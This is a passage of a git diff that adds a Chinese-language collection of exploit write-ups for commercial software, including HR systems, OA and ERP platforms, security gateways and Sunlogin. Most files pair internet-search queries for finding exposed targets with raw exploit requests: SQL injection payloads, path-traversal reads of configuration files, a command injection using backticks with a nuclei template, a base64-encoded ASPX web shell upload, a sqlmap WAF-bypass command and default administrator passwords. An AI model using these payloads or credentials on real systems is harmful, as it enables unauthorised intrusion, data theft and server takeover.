+   <soapenv:Header/>
+   <soapenv:Body>
+      <tem:GetActivexConnector/>
+   </soapenv:Body>
+</soapenv:Envelope>
+```
+
+![image-20241129102019535](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411291020719.png)
+
+
+
+## 漏洞来源
+
+- https://mp.weixin.qq.com/s/iNp5vADT3y05icdZrmNX9Q
diff --git a/同享人力管理管理平台SFZService.asmx存在SQL注入漏洞.md b/同享人力管理管理平台SFZService.asmx存在SQL注入漏洞.md
new file mode 100644
index 0000000..d4fcaef
--- /dev/null
+++ b/同享人力管理管理平台SFZService.asmx存在SQL注入漏洞.md
@@ -0,0 +1,25 @@
+# 同享人力管理管理平台SFZService.asmx存在SQL注入漏洞
+
+同享TXEHR人力管理管理平台SFZService.asmx存在SQL注入漏洞，攻击者可获取数据库敏感信息。
+
+## fofa
+
+```yaml
+body="/Assistant/Default.aspx"
+```
+
+## poc
+
+```java
+POST /Service/SFZService.asmx
+HOST: 
+SOAPAction: http://tempuri.org/GetEmployeeBySFZ
+Content-Type: text/xml;charset=UTF-8
+
+<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\"\
+      \ xmlns:tem=\"http://tempuri.org/\">\n   <soapenv:Header/>\n   <soapenv:Body>\n\
+      \      <tem:GetEmployeeBySFZ>\n         <!--type: string-->\n         <tem:strSFZ>1'\
+      \ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(107)+CHAR(122)+CHAR(122)+CHAR(113)+CHAR(81)+CHAR(78)+CHAR(79)+CHAR(122)+CHAR(106)+CHAR(69)+CHAR(103)+CHAR(80)+CHAR(87)+CHAR(89)+CHAR(117)+CHAR(97)+CHAR(104)+CHAR(105)+CHAR(74)+CHAR(109)+CHAR(80)+CHAR(68)+CHAR(74)+CHAR(98)+CHAR(122)+CHAR(99)+CHAR(103)+CHAR(90)+CHAR(68)+CHAR(105)+CHAR(114)+CHAR(107)+CHAR(69)+CHAR(86)+CHAR(121)+CHAR(76)+CHAR(69)+CHAR(115)+CHAR(102)+CHAR(81)+CHAR(76)+CHAR(105)+CHAR(101)+CHAR(74)+CHAR(113)+CHAR(112)+CHAR(113)+CHAR(98)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--\
+      \ hExp</tem:strSFZ>\n      </tem:GetEmployeeBySFZ>\n   </soapenv:Body>\n</soapenv:Envelope>
+```
+
diff --git a/同望OA系统接口tooneAssistantAttachement.jsp任意文件读取漏洞.md b/同望OA系统接口tooneAssistantAttachement.jsp任意文件读取漏洞.md
new file mode 100644
index 0000000..2e47eda
--- /dev/null
+++ b/同望OA系统接口tooneAssistantAttachement.jsp任意文件读取漏洞.md
@@ -0,0 +1,21 @@
+# 同望OA系统接口tooneAssistantAttachement.jsp任意文件读取漏洞
+
+同望OA系统接口tooneAssistantAttachement.jsp任意文件读取漏洞，可能导致敏感信息泄露、数据盗窃及其他安全风险，从而对系统和用户造成严重危害。
+
+## fofa
+
+```javascript
+body="loginAction.struts?actionType=blockLogin"
+```
+
+## poc
+
+```java
+GET /jsp/oa/app/webservice/tooneAssistant/tooneAssistantAttachement.jsp?filename=./../../../../../WEB-INF/web.xml HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537
+Accept-Encoding: gzip
+Connection: close
+```
+
+![image-20241012131723974](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410121317035.png)
\ No newline at end of file
diff --git a/同鑫eHR人力资源管理系统GetFlowDropDownListItems存在SQL注入漏洞.md b/同鑫eHR人力资源管理系统GetFlowDropDownListItems存在SQL注入漏洞.md
new file mode 100644
index 0000000..f6ab96a
--- /dev/null
+++ b/同鑫eHR人力资源管理系统GetFlowDropDownListItems存在SQL注入漏洞.md
@@ -0,0 +1,25 @@
+# 同鑫eHR人力资源管理系统GetFlowDropDownListItems存在SQL注入漏洞
+
+同鑫eHR人力资源管理系统 GetFlowDropDownListItems 接口存在SQL注入漏洞，未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息。
+
+## fofa
+
+```javascript
+body="/TX.CDN"
+```
+
+## poc
+
+```javascript
+POST /Common/GetFlowDropDownListItems HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Connection: close
+Content-Type: application/x-www-form-urlencoded; charset=utf-8
+ 
+FixedFormCode=1%27%20UNION%20ALL%20SELECT%20NULL%2C@@VERSION--
+```
+
diff --git a/向日葵远程代码执行漏洞（CNVD-2022-10270）.md b/向日葵远程代码执行漏洞（CNVD-2022-10270）.md
new file mode 100644
index 0000000..2e79fdf
--- /dev/null
+++ b/向日葵远程代码执行漏洞（CNVD-2022-10270）.md
@@ -0,0 +1,34 @@
+# 向日葵远程代码执行漏洞（CNVD-2022-10270）
+
+## 漏洞描述
+向日葵通过发送特定的请求获取CID后，可调用 check接口实现远程命令执行，导致服务器权限被获取。
+
+## 影响版本
++ 向日葵个人版 for Windows <=11.0.0.33162版本
++ 向日葵简约版 <= V1.0.1.43315（2021.12）
+
+## 漏洞复现
+向日葵开启后会默认在`4000-65535`之间开启某个端口
+
+![1679820583875-6d7b4e9b-5387-4cf5-a2e6-88ddcde3bacd.png](./img/gUlc0BSsVT6Iv0WU/1679820583875-6d7b4e9b-5387-4cf5-a2e6-88ddcde3bacd-830006.png)
+
+发送请求获取CID
+
+```java
+/cgi-bin/rpc?action=verify-haras
+```
+
+![1679820640646-5c60754e-fc3f-407f-9f0f-882daffc1ac8.png](./img/gUlc0BSsVT6Iv0WU/1679820640646-5c60754e-fc3f-407f-9f0f-882daffc1ac8-757223.png)
+
+使用获取到的 verify_string 作为 cookie的 CID字段，进行命令执行
+
+```java
+/check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+ipconfig
+```
+
+![1679820683541-36b5acf8-87ff-466c-aa76-1b3ea94f802c.png](./img/gUlc0BSsVT6Iv0WU/1679820683541-36b5acf8-87ff-466c-aa76-1b3ea94f802c-023495.png)
+
+
+
+> 更新: 2024-02-29 23:58:31  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/re22tknn48ckod6v>
\ No newline at end of file
diff --git a/启明星辰4A统一安全管控平台getMaster.do信息泄漏.md b/启明星辰4A统一安全管控平台getMaster.do信息泄漏.md
new file mode 100644
index 0000000..c94069d
--- /dev/null
+++ b/启明星辰4A统一安全管控平台getMaster.do信息泄漏.md
@@ -0,0 +1,41 @@
+# 启明星辰4A统一安全管控平台 getMaster.do 信息泄漏
+
+# 一、漏洞简介
+启明星辰4A统一安全管控平台实现对自然人、资源、资源账号的集中管理，建立“自然人账号-资源-资源账号”对应关系，实现自然人对资源的统一授权，同时，对授权人员的运维操作进行记录、分析、展现，做到作事前规划预防、事中实时监控、违规行为响应、事后合规报告、事故追踪回放，加强内部业务操作行为监管，实现日常运维和业务使用可视、可控、可信，完善安全管理体系。启明星辰4A统一安全管控平台 getMaster.do 存在信息泄漏漏洞。
+
+# 二、影响版本
++ 启明星辰4A统一安全管控平台
+
+# 三、资产测绘
++ hunter`web.icon=="fcae06c9415a39c361780b5c0e46ab89"&&web.title="4A"`
+
+![1692348117528-970daf0c-24ec-4ed7-beef-dba36540eaaf.png](./img/HqxRRRRxVqMc1zm1/1692348117528-970daf0c-24ec-4ed7-beef-dba36540eaaf-235288.png)
+
++ 登录页面
+
+![1692348142456-80423dc9-2684-4379-9606-d4c1a8468b6a.png](./img/HqxRRRRxVqMc1zm1/1692348142456-80423dc9-2684-4379-9606-d4c1a8468b6a-202217.png)
+
+# 四、漏洞复现
+```plain
+GET /accountApi/getMaster.do HTTP/2
+Host: xx.xx.xx.xx
+Cookie: sid=7a5fa1f8-5025-4d3b-9101-26d9db5b2ce0
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/116.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Upgrade-Insecure-Requests: 1
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: none
+Sec-Fetch-User: ?1
+Te: trailers
+Connection: close
+```
+
+![1692348257648-bcf13672-a23c-48c9-aa25-d55608875db4.png](./img/HqxRRRRxVqMc1zm1/1692348257648-bcf13672-a23c-48c9-aa25-d55608875db4-075599.png)
+
+
+
+> 更新: 2024-02-29 23:57:14  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ic9nsb113n14pwvh>
\ No newline at end of file
diff --git a/启明星辰天玥运维安全网关tagid参数存在SQL注入漏洞.md b/启明星辰天玥运维安全网关tagid参数存在SQL注入漏洞.md
new file mode 100644
index 0000000..c75d9e7
--- /dev/null
+++ b/启明星辰天玥运维安全网关tagid参数存在SQL注入漏洞.md
@@ -0,0 +1,51 @@
+# 启明星辰天玥运维安全网关tagid参数存在SQL注入漏洞
+
+# 一、漏洞简介
+天玥网络安全审计系统是针对业务环境下用户对网络内的核心IT资产和服务器进行的操作行为进行细粒度审计的合规性管理系统。 启明星辰天玥网络安全审计系统tagid参数存在SQL注入漏洞，攻击者可利用该漏洞获取数据库敏感信息。
+
+# 二、影响版本
++ 天玥运维安全网关
+
+# 三、资产测绘
++ hunter`app.name="启明星辰天玥运维安全网关"`
++ 特征
+
+![1695829999514-057a6e65-a46a-4f52-ae75-8e3825de7f26.png](./img/FSinckLrORo2iEIs/1695829999514-057a6e65-a46a-4f52-ae75-8e3825de7f26-527751.png)
+
+# 四、漏洞复现
+```plain
+POST /ops/index.php?c=Reportguide&a=checkrn HTTP/1.1
+Host: xx.xx.xx.xx
+Connection: close
+Cache-Control: max-age=0
+sec-ch-ua: "Chromium";v="88", "Google Chrome";v="88", ";Not A Brand";v="99"
+sec-ch-ua-mobile: ?0
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9
+Sec-Fetch-Site: none
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: document
+Accept-Language: zh-CN,zh;q=0.9
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 39
+
+
+checkname=123&tagid=123 AND 5327=(SELECT 5327 FROM PG_SLEEP(5))-- OkPa
+```
+
+![1695830126957-ef52dde0-c4a0-4091-9a31-e48cb5479e62.png](./img/FSinckLrORo2iEIs/1695830126957-ef52dde0-c4a0-4091-9a31-e48cb5479e62-580083.png)
+
+sqlmap 
+
+```plain
+sqlmap -u "https://xx.xx.xx.xx/ops/index.php?c=Reportguide&a=checkrn" --data "checkname=123&tagid=123" --skip-waf --random-agent --batch -p tagid  --tamper=space2comment
+```
+
+![1695830139590-b1329279-4467-45bf-864d-5c0dce53ffe3.png](./img/FSinckLrORo2iEIs/1695830139590-b1329279-4467-45bf-864d-5c0dce53ffe3-600301.png)
+
+
+
+> 更新: 2024-02-29 23:57:14  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/lli5osp0pzdm1zdo>
\ No newline at end of file
diff --git a/启明星辰天玥运维安全网关默认口令.md b/启明星辰天玥运维安全网关默认口令.md
new file mode 100644
index 0000000..fda8df3
--- /dev/null
+++ b/启明星辰天玥运维安全网关默认口令.md
@@ -0,0 +1,28 @@
+# 启明星辰天玥运维安全网关默认口令
+
+# 一、漏洞简介
+天玥网络安全审计系统是针对业务环境下用户对网络内的核心IT资产和服务器进行的操作行为进行细粒度审计的合规性管理系统。 启明星辰天玥运维安全网关存在多个默认口令
+
+# 二、影响版本
++ 天玥运维安全网关
+
+# 三、资产测绘
++ hunter`app.name="启明星辰天玥运维安全网关"`
++ 特征
+
+![1695829999514-057a6e65-a46a-4f52-ae75-8e3825de7f26.png](./img/6eUffIONIfcTkeQY/1695829999514-057a6e65-a46a-4f52-ae75-8e3825de7f26-061247.png)
+
+# 四、漏洞复现
+```plain
+sysuseradmin/sua_password$123
+sysauditor/sa_password$123
+sysadmin/password$123
+sysadmin1/sysadmin111111
+```
+
+![1698595769008-9efbda7f-bc1b-4063-b4d3-854b72ff69bc.png](./img/6eUffIONIfcTkeQY/1698595769008-9efbda7f-bc1b-4063-b4d3-854b72ff69bc-263554.png)
+
+
+
+> 更新: 2024-02-29 23:57:14  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/kx93eeqothpuo5ek>
\ No newline at end of file
diff --git a/员工自助平台loginByPassword存在SQL注入漏洞.md b/员工自助平台loginByPassword存在SQL注入漏洞.md
new file mode 100644
index 0000000..2cb744e
--- /dev/null
+++ b/员工自助平台loginByPassword存在SQL注入漏洞.md
@@ -0,0 +1,35 @@
+# 员工自助平台loginByPassword存在SQL注入漏洞
+
+# 一、漏洞简介
+ 广州翰智软件有限公司员工自助平台是指该公司为其员工提供的一种在线平台，旨在提高员工的工作效率、简化人力资源管理流程、增强员工的自主权和满意度。广州翰智软件有限公司员工自助平台 loginByPassword接口处存在SQL注入漏洞，恶意攻击者可能会利用此漏洞修改数据库中的数据，例如添加、删除或修改记录，导致数据损坏或丢失。  
+
+# 二、影响版本
++ ShowDoc
+
+# 三、资产测绘
++ fofa`<font style="color:rgb(199, 37, 78);">body="./static/hrfonts/iconfont.css"</font>`
++ 特征
+
+![1717127090648-66b3e7cf-d1a8-4fc5-8007-a4fdcde6ee9f.png](./img/nEpGZuhTscZgPPDk/1717127090648-66b3e7cf-d1a8-4fc5-8007-a4fdcde6ee9f-326976.png)
+
+# 四、漏洞复现
+```rust
+POST /hrssc/portal/plantform/loginByPassword HTTP/1.1
+Host: 
+Accept: application/json, text/plain, */*
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
+Content-Type: application/json
+Accept-Encoding: gzip, deflate, br
+Accept-Language: zh-CN,zh;q=0.9
+Content-Length: 40
+Connection: close
+
+{"userName":"admin' AND 8383=DBMS_PIPE.RECEIVE_MESSAGE(CHR(76)||CHR(98)||CHR(97)||CHR(122),5)-- eWnt","password":"admin"}
+```
+
+![1717127299072-04b69d65-65a2-42cc-a9e7-ec94f961e688.png](./img/nEpGZuhTscZgPPDk/1717127299072-04b69d65-65a2-42cc-a9e7-ec94f961e688-403036.png)
+
+
+
+> 更新: 2024-06-01 11:14:22  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/gy1kmhftuc02g8h8>
\ No newline at end of file
diff --git a/和信创天云桌面系统newserver远程命令执行漏洞.md b/和信创天云桌面系统newserver远程命令执行漏洞.md
new file mode 100644
index 0000000..ae54ccc
--- /dev/null
+++ b/和信创天云桌面系统newserver远程命令执行漏洞.md
@@ -0,0 +1,57 @@
+# 和信创天云桌面系统newserver远程命令执行漏洞
+
+和信创天云桌面系统newserver远程命令执行漏洞
+
+## fofa
+
+```javascript
+icon_hash="-1515283145" || title="和信下一代云桌面VENGD"
+```
+
+## poc
+
+```javascript
+POST /vesystem/index.php/New/Fn/newserver HTTP/1.1
+Host: 
+Accept-Encoding: gzip
+Connection: close
+Content-Length: 118
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
+
+ip=`ping dnslog`&user=1&pwd=1&type=1&c_type=1&local=1&server_os_str=1&server_os_version_str=1
+```
+
+
+
+## yaml
+
+```yaml
+id: fox-template
+
+info:
+  name: fox-template
+  author: fox
+  severity: high
+
+http:
+  - raw:
+      - |
+        POST /vesystem/index.php/New/Fn/newserver HTTP/1.1
+        Host: {{Hostname}}
+        Accept-Encoding: gzip
+        Connection: close
+        Content-Length: 118
+        Content-Type: application/x-www-form-urlencoded
+        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
+
+        ip=`ping {{interactsh-url}}`&user=1&pwd=1&type=1&c_type=1&local=1&server_os_str=1&server_os_version_str=1
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: interactsh_protocol  # 配合 {{interactsh-url}} 关键词使用
+        words:
+          - "dns"
+```
+
diff --git a/和信创天云桌面系统upload_file存在任意文件上传.md b/和信创天云桌面系统upload_file存在任意文件上传.md
new file mode 100644
index 0000000..3a97213
--- /dev/null
+++ b/和信创天云桌面系统upload_file存在任意文件上传.md
@@ -0,0 +1,49 @@
+# 和信创天云桌面系统upload_file存在任意文件上传
+
+# 一、漏洞简介
+和信创天专注虚拟化云计算领域，为首家集VOI/VDI/IDV于一体的云桌面厂家,助力教育、医疗、政企、军工、电力、金融等行业客户实现千台终端统一管理,确保数据安全与业务连续性。和信下一代云桌面基于VDI/VOI/IDV三种技术架构优势，对于用户应用场景有着普遍的适用性，前后端混合计算保证在调度服务器后端资源的同时，也能充分利用前端计算资源，高性能的电脑和低功耗的瘦终端均能流畅地运行各种操作系统与应用软件，能够轻松实现千点以上大规模终端的集中管理。和信创天云桌面系统upload_file存在任意文件上传，攻击者可通过该漏洞获取服务器权限。
+
+# 二、影响版本
++ 和信创天云桌面系统
+
+# 三、资产测绘
++ hunter`web.body="和信下一代云桌面"`
++ 特征
+
+![1700670558533-55a9d1bc-a7a3-4007-ba7d-54decc95331c.png](./img/L3khDGEcH1tVVfGk/1700670558533-55a9d1bc-a7a3-4007-ba7d-54decc95331c-942950.png)
+
+# 四、漏洞复现
+```python
+POST /Upload/upload_file.php?l=1 HTTP/1.1
+Host: xx.xx.xx.xx
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36
+Accept: image/avif,image/webp,image/apng,image/*,*/*;q=0.8
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9,fil;q=0.8
+Cookie: think_language=zh-cn; PHPSESSID_NAMED=h9j8utbmv82cb1dcdlav1cgdf6
+Connection: close
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfcKRltGv
+Content-Length: 192
+
+------WebKitFormBoundaryfcKRltGv
+Content-Disposition: form-data; name="file"; filename="test.php"
+Content-Type: image/avif
+
+<?php phpinfo(); ?>
+------WebKitFormBoundaryfcKRltGv--
+```
+
+![1700670586959-6ff525af-136b-4194-904a-dd8f1474a990.png](./img/L3khDGEcH1tVVfGk/1700670586959-6ff525af-136b-4194-904a-dd8f1474a990-710340.png)
+
+上传文件位置
+
+```python
+/Upload/1/test.php
+```
+
+![1700670612940-6bcb01bb-5acb-4705-b6d8-5e9f19145375.png](./img/L3khDGEcH1tVVfGk/1700670612940-6bcb01bb-5acb-4705-b6d8-5e9f19145375-550414.png)
+
+
+
+> 更新: 2024-02-29 23:55:44  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/im6hi1mdzqn6l81q>
\ No newline at end of file
diff --git a/哲霖机械ERP接口DownloadInpFile存在任意文件读取漏洞.md b/哲霖机械ERP接口DownloadInpFile存在任意文件读取漏洞.md
new file mode 100644
index 0000000..ccca6f6
--- /dev/null
+++ b/哲霖机械ERP接口DownloadInpFile存在任意文件读取漏洞.md
@@ -0,0 +1,23 @@
+# 哲霖机械ERP接口DownloadInpFile存在任意文件读取漏洞
+
+哲霖机械ERP DownloadInpFile 接口存在任意文件读取漏洞，未经身份验证攻击者可通过该漏洞读取系统重要文件（如数据库配置文件、系统配置文件）、数据库配置文件等等，导致网站处于极度不安全状态。
+
+## fofa
+
+```javascript
+body="Api/UserApi/GetUserName"
+```
+
+## poc
+
+```javascript
+GET /Basics/DownloadInpFile?filePath=C:\windows\win.ini HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/41.0.887.0 Safari/532.1
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close
+```
+
+![46554740fd4b4fe7abd8dca35c7e629b.png](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409132235284.png)
\ No newline at end of file
diff --git a/唯徳知识产权管理系统DownloadFileWordTemplate接口存在文件读取漏洞.md b/唯徳知识产权管理系统DownloadFileWordTemplate接口存在文件读取漏洞.md
new file mode 100644
index 0000000..c279ff1
--- /dev/null
+++ b/唯徳知识产权管理系统DownloadFileWordTemplate接口存在文件读取漏洞.md
@@ -0,0 +1,30 @@
+# 唯徳知识产权管理系统DownloadFileWordTemplate接口存在文件读取漏洞
+
+唯徳知识产权管理系统 DownloadFileWordTemplate 接口存在文件读取漏洞，未经身份验证攻击者可通过该漏洞读取系统重要文件（如数据库配置文件、系统配置文件）、数据库配置文件等等，导致网站处于极度不安全状态。
+
+## fofa
+
+```javascript
+body="JSCOMM/language.js"
+```
+
+## poc
+
+```javascript
+POST /AutoUpdate/WSFM.asmx HTTP/1.1
+Host: 
+Content-Type: text/xml; charset=utf-8
+Content-Length: length
+SOAPAction: "http://tempuri.org/DownloadFileWordTemplate"
+
+<?xml version="1.0" encoding="utf-8"?>
+<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
+  <soap:Body>
+    <DownloadFileWordTemplate xmlns="http://tempuri.org/">
+      <fileName>../../web.config</fileName>
+    </DownloadFileWordTemplate>
+  </soap:Body>
+</soap:Envelope>
+```
+
+![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409141639464.png)
\ No newline at end of file
diff --git a/唯徳知识产权管理系统WSFM.asmx接口存在任意文件上传漏洞.md b/唯徳知识产权管理系统WSFM.asmx接口存在任意文件上传漏洞.md
new file mode 100644
index 0000000..fe67fab
--- /dev/null
+++ b/唯徳知识产权管理系统WSFM.asmx接口存在任意文件上传漏洞.md
@@ -0,0 +1,35 @@
+# 唯徳知识产权管理系统WSFM.asmx接口存在任意文件上传漏洞
+
+唯徳知识产权管理系统 /AutoUpdate/WSFM.asmx 接口存在任意文件上传漏洞，未经身份验证的攻击者可通过该漏洞在服务器端任意执行代码，写入后门，获取服务器权限，进而控制整个 web 服务器。
+
+## fofa
+
+```javascript
+body="JSCOMM/language.js"
+```
+
+## poc
+
+```javascript
+POST /AutoUpdate/WSFM.asmx HTTP/1.1
+Host: 
+Content-Type: text/xml; charset=utf-8
+Content-Length: length
+SOAPAction: "http://tempuri.org/UploadFileWordTemplate"
+
+<?xml version="1.0" encoding="utf-8"?>
+<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
+  <soap:Body>
+    <UploadFileWordTemplate xmlns="http://tempuri.org/">
+      <fileByteArray>PCVAIFBhZ2UgTGFuZ3VhZ2U9IkpzY3JpcHQiIHZhbGlkYXRlUmVxdWVzdD0iZmFsc2UiICU+CjwlCnZhciBjPW5ldyBTeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2Vzc1N0YXJ0SW5mbygiY21kIik7CnZhciBlPW5ldyBTeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcygpOwp2YXIgb3V0OlN5c3RlbS5JTy5TdHJlYW1SZWFkZXIsRUk6U3lzdGVtLklPLlN0cmVhbVJlYWRlcjsKYy5Vc2VTaGVsbEV4ZWN1dGU9ZmFsc2U7CmMuUmVkaXJlY3RTdGFuZGFyZE91dHB1dD10cnVlOwpjLlJlZGlyZWN0U3RhbmRhcmRFcnJvcj10cnVlOwplLlN0YXJ0SW5mbz1jOwpjLkFyZ3VtZW50cz0iL2MgIiArIFJlcXVlc3QuSXRlbVsiY21kIl07CmUuU3RhcnQoKTsKb3V0PWUuU3RhbmRhcmRPdXRwdXQ7CkVJPWUuU3RhbmRhcmRFcnJvcjsKZS5DbG9zZSgpOwpSZXNwb25zZS5Xcml0ZShvdXQuUmVhZFRvRW5kKCkgKyBFSS5SZWFkVG9FbmQoKSk7ClN5c3RlbS5JTy5GaWxlLkRlbGV0ZShSZXF1ZXN0LlBoeXNpY2FsUGF0aCk7ClJlc3BvbnNlLkVuZCgpOyU+</fileByteArray>
+      <remotePath>/TemplateFiles/rce.aspx</remotePath>
+    </UploadFileWordTemplate>
+  </soap:Body>
+</soap:Envelope>
+```
+
+![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409141637528.png)
+
+
+
+文件路径：`\TemplateFiles\rce.aspx`
\ No newline at end of file
diff --git a/商混ERP系统接口Operater_Action.aspx存在SQL注入漏洞.md b/商混ERP系统接口Operater_Action.aspx存在SQL注入漏洞.md
new file mode 100644
index 0000000..68a47cc
--- /dev/null
+++ b/商混ERP系统接口Operater_Action.aspx存在SQL注入漏洞.md
@@ -0,0 +1,23 @@
+## 商混ERP系统接口Operater_Action.aspx存在SQL注入漏洞
+
+商混ERP系统 **Operater_Action.aspx**接口存在SQL注入漏洞，未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息。
+
+## fofa
+
+```javascript
+title="商混ERP系统"
+```
+
+## poc
+
+```javascript
+GET /Dispatch/Operater_Action.aspx?action=TaskComplete&id=1%27WAITFOR+DELAY+%270:0:5%27-- HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Connection: close
+```
+
+![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409141642074.png)
\ No newline at end of file
diff --git a/商混ERP系统接口StockreceiveEdit.aspx存在SQL注入漏洞.md b/商混ERP系统接口StockreceiveEdit.aspx存在SQL注入漏洞.md
new file mode 100644
index 0000000..71c6593
--- /dev/null
+++ b/商混ERP系统接口StockreceiveEdit.aspx存在SQL注入漏洞.md
@@ -0,0 +1,21 @@
+## 商混ERP系统接口StockreceiveEdit.aspx存在SQL注入漏洞
+
+商混ERP系统 StockreceiveEdit.aspx 接口存在SQL注入漏洞，未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息。
+
+## fofa
+```javascript
+title="商混ERP系统"
+```
+
+## poc
+```javascript
+GET /ERP/StockreceiveEdit.aspx?id=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Connection: close
+```
+
+![84d3ac1b3fae42b6b8c215f24af8f95e.png](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409141641376.png)
diff --git a/商混ERP系统接口TaskCarToQueue.aspx存在SQL注入漏洞.md b/商混ERP系统接口TaskCarToQueue.aspx存在SQL注入漏洞.md
new file mode 100644
index 0000000..2609cc0
--- /dev/null
+++ b/商混ERP系统接口TaskCarToQueue.aspx存在SQL注入漏洞.md
@@ -0,0 +1,21 @@
